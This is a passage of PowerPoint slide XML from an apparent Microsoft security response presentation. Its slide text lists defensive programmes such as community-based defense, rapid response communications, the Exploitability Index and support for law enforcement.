          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="214752" y="4695824"/>
              <a:ext cx="1511733" cy="1762125"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13327" name="Picture 3" descr="C:\Program Files\Microsoft Resource DVD Artwork\DVD_ART\Artwork_Imagery\HARDWARE_IMAGERY\Illustration - Misc Hardware\Windows Vista Illustration Icons\Security Critical.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId13"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="489528" y="5123875"/>
              <a:ext cx="914239" cy="914239"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="TextBox 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292225" y="1708150"/>
            <a:ext cx="6937375" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Community-based defense – Collaboration across borders</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="TextBox 50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403350" y="2757488"/>
            <a:ext cx="6746875" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Rapid response communications – “911 for the Internet”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="TextBox 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1468438" y="3805238"/>
            <a:ext cx="6784975" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Defensive security knowledge – educate officials &amp; public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="TextBox 52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579563" y="4854575"/>
            <a:ext cx="5383212" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Isolate malicious software – Patch machines! </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="TextBox 53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579563" y="5903913"/>
            <a:ext cx="6559550" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Support of worldwide law enforcement and legislatures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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93118"/>
            <a:ext cx="8382000" cy="664797"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>MSRC Evolution</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48131" name="Group 45"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="176213" y="5029200"/>
            <a:ext cx="8145462" cy="1762125"/>
            <a:chOff x="175484" y="5949229"/>
            <a:chExt cx="8146480" cy="1762125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48153" name="Picture 41" descr="cooltools-shape.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="187614" y="6286500"/>
              <a:ext cx="8134350" cy="1143000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48154" name="Picture 25" descr="C:\Program Files\Microsoft Resource DVD Artwork\DVD_ART\Artwork_Imagery\Shapes and Graphics\Glow\white oval shaped glow.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="175484" y="5949229"/>
              <a:ext cx="1511733" cy="1762125"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48155" name="Picture 5" descr="C:\Documents and Settings\mikez\Local Settings\Temporary Internet Files\Content.IE5\GTYBWD23\MCj04315940000[1].png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="547484" y="6455679"/>
              <a:ext cx="813339" cy="813339"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48132" name="Group 48"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="176213" y="822325"/>
            <a:ext cx="8134350" cy="1762125"/>
            <a:chOff x="127000" y="-210128"/>
            <a:chExt cx="8134350" cy="1762125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48150" name="Picture 29" descr="cooltools-shape.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="127000" y="127000"/>
              <a:ext cx="8134350" cy="1143000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48151" name="Picture 25" descr="C:\Program Files\Microsoft Resource DVD Artwork\DVD_ART\Artwork_Imagery\Shapes and Graphics\Glow\white oval shaped glow.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="191656" y="-210128"/>
              <a:ext cx="1511733" cy="1762125"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48152" name="Picture 21" descr="C:\Documents and Settings\mikez\Local Settings\Temporary Internet Files\Content.IE5\45Y78TE7\MCj02959630000[1].wmf"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="532741" y="332510"/>
              <a:ext cx="815768" cy="738401"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48133" name="Group 47"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="92075" y="1922463"/>
            <a:ext cx="8224838" cy="1762125"/>
            <a:chOff x="55416" y="1496434"/>
            <a:chExt cx="8224407" cy="1762125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48147" name="Picture 30" descr="cooltools-shape.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="145473" y="1787525"/>
              <a:ext cx="8134350" cy="1143000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48148" name="Picture 25" descr="C:\Program Files\Microsoft Resource DVD Artwork\DVD_ART\Artwork_Imagery\Shapes and Graphics\Glow\white oval shaped glow.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="55416" y="1496434"/>
              <a:ext cx="1511733" cy="1762125"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48149" name="Picture 2" descr="C:\Program Files\Microsoft Resource DVD Artwork\DVD_ART\Artwork_Imagery\Shapes and Graphics\communication towers satellites\radio tower 3.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="587983" y="1945567"/>
              <a:ext cx="483894" cy="806870"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48134" name="Group 46"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="176213" y="2873375"/>
            <a:ext cx="8145462" cy="1762125"/>
            <a:chOff x="175484" y="2798760"/>
            <a:chExt cx="8146480" cy="1762125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48144" name="Picture 31" descr="cooltools-shape.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="187614" y="3184236"/>
              <a:ext cx="8134350" cy="1143000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48145" name="Picture 25" descr="C:\Program Files\Microsoft Resource DVD Artwork\DVD_ART\Artwork_Imagery\Shapes and Graphics\Glow\white oval shaped glow.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="175484" y="2798760"/>
              <a:ext cx="1511733" cy="1762125"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48146" name="Picture 4" descr="C:\Documents and Settings\mikez\Local Settings\Temporary Internet Files\Content.IE5\BYSNND8D\MCj04315780000[1].png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId11"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="499919" y="3223491"/>
              <a:ext cx="1032208" cy="1039090"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48135" name="Group 43"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="184150" y="3973513"/>
            <a:ext cx="8134350" cy="1762125"/>
            <a:chOff x="187614" y="4695824"/>
            <a:chExt cx="8134350" cy="1762125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48141" name="Picture 38" descr="cooltools-shape.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId12"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="187614" y="5031509"/>
              <a:ext cx="8134350" cy="1143000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48142" name="Picture 25" descr="C:\Program Files\Microsoft Resource DVD Artwork\DVD_ART\Artwork_Imagery\Shapes and Graphics\Glow\white oval shaped glow.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="214752" y="4695824"/>
              <a:ext cx="1511733" cy="1762125"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48143" name="Picture 3" descr="C:\Program Files\Microsoft Resource DVD Artwork\DVD_ART\Artwork_Imagery\HARDWARE_IMAGERY\Illustration - Misc Hardware\Windows Vista Illustration Icons\Security Critical.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId13"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="489528" y="5123875"/>
              <a:ext cx="914239" cy="914239"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="TextBox 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292225" y="1498600"/>
            <a:ext cx="6937375" cy="708025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Community-based defense – Microsoft Active Protection Program </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="TextBox 50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403350" y="2547938"/>
            <a:ext cx="6746875" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Rapid response communications – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>SCPCert</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="TextBox 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1468438" y="3595688"/>
            <a:ext cx="6057900" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Defensive security knowledge – Exploitability Index</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="TextBox 52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579563" y="4521200"/>
            <a:ext cx="6419850" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Isolate malicious software – MS Vulnerability Research</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="TextBox 53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579563" y="5694363"/>
            <a:ext cx="6559550" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Support of worldwide law enforcement and legislatures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="736991"/>
          <a:ext cx="9144000" cy="323450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9" name="Content Placeholder 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="13648" y="3878305"/>
          <a:ext cx="8991600" cy="2895599"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="49156" name="Picture 5" descr="D:\DVD_ART34\Artwork_Imagery\Icons - Illustrations\_WINDOWS VISTA ICONS\Security Critical warning bad unsafe.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7329488" y="4945063"/>
            <a:ext cx="838200" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
